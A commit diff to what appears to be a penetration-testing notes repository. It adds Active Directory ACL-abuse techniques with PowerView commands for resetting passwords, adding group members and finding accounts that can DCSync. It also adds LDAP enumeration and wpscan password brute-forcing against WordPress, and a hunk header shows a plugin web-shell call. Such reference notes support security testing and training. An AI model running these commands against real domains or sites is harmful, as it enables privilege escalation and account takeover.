[AHK] Automatic update 👽

admin/networking/routing.md

@@ -47,7 +47,7 @@ Cmd > route add 10.10.10.0 mask 255.255.255.0 192.168.0.181
 
 I shall configure an intermediate OpenVPN server to serve as a jump box (1st hop) to connect to the target lab. It's helpful when the target OpenVPN server (2nd hop) doesn't allow to have multiple connections with the same common name (`--duplicate-cn` not set), i.e. using the same client's `.ovpn` profile.
 
-![](/.gitbook/assets/2.png)
+![](/.gitbook/assets/002.png)
 
 Quick OpenVPN server installation:
 

pentest/internal/ad/README.md

@@ -11,7 +11,7 @@
 * [https://github.com/ropnop/windapsearch](https://github.com/ropnop/windapsearch)
 * [https://github.com/snovvcrash/windapsearch](https://github.com/snovvcrash/windapsearch)
 
-Query LDAP for all domain computer accounts (+ try to resolve their IPs) and save results into a csv file:
+Query LDAP for all domain computer accounts (+ try to resolve their IPs with `-r` flag) and save results into a csv file:
 
 ```
 $ python3 windapsearch.py --dc-ip 192.168.1.11 -d megacorp.local -u 'MEGACORP\snovvcrash' -p 'Passw0rd!' -C -r | tee ~/ws/enum/all-computers.csv

pentest/internal/ad/acl-abuse.md

@@ -11,15 +11,56 @@
 
 ACL BloodHound abuse hierarchy (by [@HackAndDo](https://twitter.com/HackAndDo/status/1398309183074754562)):
 
-![](/.gitbook/assets/1.png)
+![](/.gitbook/assets/001.png)
 
+Some AD object security permissions abusable with PowerView/SharpView:
 
+* **ForceChangePassword** abused with `Set-DomainUserPassword`.
+* **AddMembers** abused with `Add-DomainGroupMember`.
+* **GenericAll** abused with `Set-DomainUserPassword` or `Add-DomainGroupMember`.
+* **GenericWrite** abused with `Set-DomainObject`.
+* **WriteOwner** abused with `Set-DomainObjectOwner`.
+* **WriteDACL** abused with `Add-DomainObjectACL`.
+* **AllExtendedRights** abused with `Set-DomainUserPassword` or `Add-DomainGroupMember`.
+
+
+Add-DomainObjectAcl -TargetIdentity matt -PrincipalIdentity will -Rights ResetPassword -Verbose
 
 
 ## Hunt for ACLs
 
 
 
+### ActiveDirectory
+
+Enumerate ACLs which `snovvcrash` user possesses against `j.doe` user:
+
+```
+PS > (Get-ACL "AD:$((Get-ADUser j.doe).distinguishedName)").access | ? {$_.IdentityReference -eq "MEGACORP\snovvcrash"}
+```
+
+Enumerate which users possess `GenericAll` or `AllExtendedRights` permission against `j.doe` user:
+
+```
+PS > (Get-ACL "AD:$((Get-ADUser j.doe).distinguishedName)").access | ? {$_.ActiveDirectoryRights -match "GenericAll" -or $_.ActiveDirectoryRights -match "AllExtendedRights"} | select IdentityReference,ActiveDirectoryRights -Unique | ft -W
+```
+
+PowerView analog:
+
+```
+PowerView3 > Get-DomainObjectAcl -Identity j.doe -Domain megacorp.local -ResolveGUIDs | ? {$_.ActiveDirectoryRights -match "GenericAll" -or $_.ActiveDirectoryRights -match "AllExtendedRights"} | select SecurityIdentifier | sort -Property SecurityIdentifier -Unique
+PowerView3 > ConvertFrom-SID <SECURITY_IDENTIFIER>
+```
+
+Find all users who can DCSync and convert their SIDs to names:
+
+```
+PowerView3 > $dcsync = Get-ObjectACL "DC=megacorp,DC=local" -ResolveGUIDs | ? {$_.ActiveDirectoryRights -match "GenericAll" -or $_.ObjectAceType -match "Replication-Get"} | select -ExpandProperty SecurityIdentifier | select -ExpandProperty value
+PowerView3 > Convert-SidToName $dcsync
+```
+
+
+
 ### PowerView2
 
 Search for interesting ACLs:

pentest/web/wordpress.md

@@ -18,6 +18,6 @@ $ curl 'http://10.10.13.37/wp-content/plugins/plugin-shell/plugin-shell.php?cmd=
 * [https://wpscan.com/profile](https://wpscan.com/profile)
 
 ```
-$ wpscan --url http://10.10.13.37/wp/ --api-token <API_TOKEN> --force -e ap
+$ wpscan --url http://10.10.13.37/wp/ --api-token <API_TOKEN> --force -e ap --plugin-detection aggressive -o wpscan.out
 $ wpscan --url http://10.10.13.37/wp/ --api-token <API_TOKEN> --force --passwords /usr/share/seclists/Passwords/darkweb2017-top1000.txt
 ```